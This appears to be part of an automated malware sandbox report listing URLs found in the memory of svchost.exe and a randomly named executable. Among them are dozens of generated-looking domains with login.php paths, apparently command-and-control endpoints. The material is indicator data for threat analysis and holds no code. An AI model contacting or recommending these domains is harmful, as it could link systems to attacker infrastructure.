Source: svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secex
Source: svchost.exe, 0000000E.00000003.2495670972.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663768290.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496072630.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2619570984.0000017E5C376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2692163095.0000017E5C375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2708710682.0000017E5C377000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2459398968.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620633015.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3273051991.0000017E5C376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2737884459.0000017E5C374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721429609.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2544281210.0000017E5C35A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3273209037.0000017E5CA00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721838801.0000017E5C375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2707237589.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2735438447.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663854848.0000017E5C378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2691874635.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 0000000E.00000003.2497798842.0000017E5C30F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2498088928.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496908758.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2708202972.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2495670972.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620568756.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2692130813.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2607005185.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721724752.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663679549.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496072630.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2737081538.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2708824809.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663951879.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721936085.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2692062029.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663822263.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2593122356.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620465897.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2497932591.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2498749154.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
Source: svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA
Source: svchost.exe, 0000000E.00000003.2559787764.0000017E5C376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAA
Source: svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
Source: svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdUHV4ZU
Source: svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdXdgj
Source: svchost.exe, 0000000E.00000003.2707237589.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2691874635.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
Source: svchost.exe, 0000000E.00000003.2721429609.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
Source: svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdzun9
Source: svchost.exe, 0000000E.00000003.2721429609.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2735438447.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd~
Source: svchost.exe, 0000000E.00000003.2663768290.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.x
Source: svchost.exe, 0000000E.00000003.2544281210.0000017E5C35A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721838801.0000017E5C375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2707237589.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2551035023.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2735438447.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663854848.0000017E5C378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3272292196.0000017E5BAE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2691874635.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 0000000E.00000003.2497798842.0000017E5C30F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2498088928.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496908758.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2708202972.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2495670972.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620568756.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2692130813.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2607005185.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721724752.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663679549.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496072630.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2737081538.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2708824809.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663951879.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721936085.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2692062029.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663822263.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2593122356.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2620465897.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2497932591.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2498749154.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663768290.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdZ6PU
Source: svchost.exe, 0000000E.00000003.2459398968.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
Source: svchost.exe, 0000000E.00000003.2551035023.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdrty
Source: svchost.exe, 0000000E.00000003.2735438447.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsAAAA
Source: svchost.exe, 00000002.00000003.2839762910.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2839860415.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2600836832.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2890700232.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004653481.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyciz.com/login.php
Source: svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyciz.com/login.php3
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gadyniw.com/login.php
Source: svchost.exe, 00000002.00000002.3273475896.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyhiz.com/login.php
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084959742.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gahyqah.com/login.php
Source: svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galynuh.com/login.php
Source: login[2].htm1.2.dr	String found in binary or memory: http://galyqaz.com/Commercial_Printing_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUG
Source: login[2].htm1.2.dr	String found in binary or memory: http://galyqaz.com/Print_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8yGzA
Source: login[2].htm1.2.dr	String found in binary or memory: http://galyqaz.com/Printing_Inks.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8yGzAG
Source: login[2].htm1.2.dr	String found in binary or memory: http://galyqaz.com/Printing_Machines.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8y
Source: login[2].htm1.2.dr	String found in binary or memory: http://galyqaz.com/Printing_Supplies.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8y
Source: login[2].htm1.2.dr	String found in binary or memory: http://galyqaz.com/display.cfm
Source: svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://galyqaz.com/login.php
Source: svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004653481.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyfus.com/login.php
Source: svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004653481.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyfus.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.2839919583.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273475896.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyhub.com/login.php
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: login[2].htm1.2.dr	String found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
Source: svchost.exe, 00000002.00000003.3004653481.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lygyvuj.com/login.php
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymyxid.com/login.php
Source: svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004653481.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyrysor.com/login.php
Source: svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyfyj.com/login.php
Source: login[1].htm0.2.dr	String found in binary or memory: http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC
Source: svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2890700232.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyvyxor.com/login.php
Source: svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2600836832.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273475896.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxynyx.com/login.php
Source: svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyxynyx.com/login.php3
Source: svchost.exe, 0000000E.00000003.2602576677.0000017E5CAAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: svchost.exe, 00000002.00000003.3004653481.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupycag.com/login.php
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273475896.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pupydeq.com/login.php
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.0000000001230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzylyp.com/
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2890700232.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.0000000001148000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.0000000001209000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.0000000001216000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.00000000011EF000.00000004.00000020.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.000000000120E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzylyp.com/login.php
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.00000000011EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzylyp.com/login.php09J
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.00000000011EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzylyp.com/login.phpA:
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000004.00000002.2718622686.00000000011EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://puzylyp.com/login.phpL:
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyhig.com/login.php
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyhig.com/login.phpl
Source: svchost.exe, 00000002.00000003.2839762910.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273273132.0000000002BAE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2655234712.000000000085F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2839860415.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2600836832.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273475896.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3271632559.00000000008A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyval.com/login.php
Source: svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyval.com/login.php29
Source: svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyval.com/login.php3
Source: svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qegyval.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qetyfuv.com/login.php
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2839919583.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273475896.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qetyhyg.com/login.php
Source: svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2600836832.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://qexyhuv.com/login.php
Source: svchost.exe, 0000000E.00000003.2497798842.0000017E5C30F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2498088928.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496908758.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2497932591.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496322414.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
